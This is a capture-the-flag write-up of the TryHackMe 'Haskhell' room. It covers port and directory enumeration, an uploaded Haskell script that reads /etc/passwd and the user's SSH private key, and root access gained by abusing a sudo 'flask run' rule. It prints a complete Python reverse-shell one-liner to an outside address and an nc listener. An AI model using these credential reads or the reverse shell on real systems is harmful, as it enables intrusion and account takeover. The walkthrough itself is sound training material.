Description:
The Following Post is writeup of Haskhell room of tryhackme https://tryhackme.com/room/haskhell
Machine | Details |
---|---|
OS | linux |
Rating | Medium |
Creator | sgtscout |
Summary:
The machine have a webpage at port 5001 you will see a message from your prof about uploading assignment We made a Simple Haskell script for reading file(I am not good in Haskell). We got lucky about the permissions and get id_rsa printed. Login as user then for privesc we have sudo permissions to run flask app and we run python reverse shell as flask app.
Walkthrough:
Enumeration
Lets start with nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sC -sV <ip>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
| 256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_ 256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
5001/tcp open http Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.91 seconds
We can see server at port 5001
let’s dirbust it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌─[✗]─[silver@parrot]─[~]
└──╼ $gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.30.179:5001
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.30.179:5001
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/04 00:56:40 Starting gobuster
===============================================================
/submit (Status: 200)
===============================================================
2020/08/04 01:01:57 Finished
===============================================================
we got a submit dir let’s see what we can submit We need to make a haskell script to see if we can get any output or not
1
2
3
4
└──╼ $cat try.hs
main = do
x <- readFile "/etc/passwd"
putStr x
Now we know prof lets check out .ssh key So we changed the readfile to /home/prof/.ssh/id_rsa
we got key hurray crack using john
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└──╼ $/usr/share/john/ssh2john.py id_rsa > crack.hash
id_rsa has no password!
prof@haskhell:~$ sudo -l
Matching Defaults entries for prof on haskhell:
env_reset, env_keep+=FLASK_APP, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User prof may run the following commands on haskhell:
(root) NOPASSWD: /usr/bin/flask run
Now we know flask run python let's try with python rev shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
$ export FLASK_APP=hello.py
$ export FLASK_DEBUG=1
$ flask run
nc -lvnp 1234
Rooted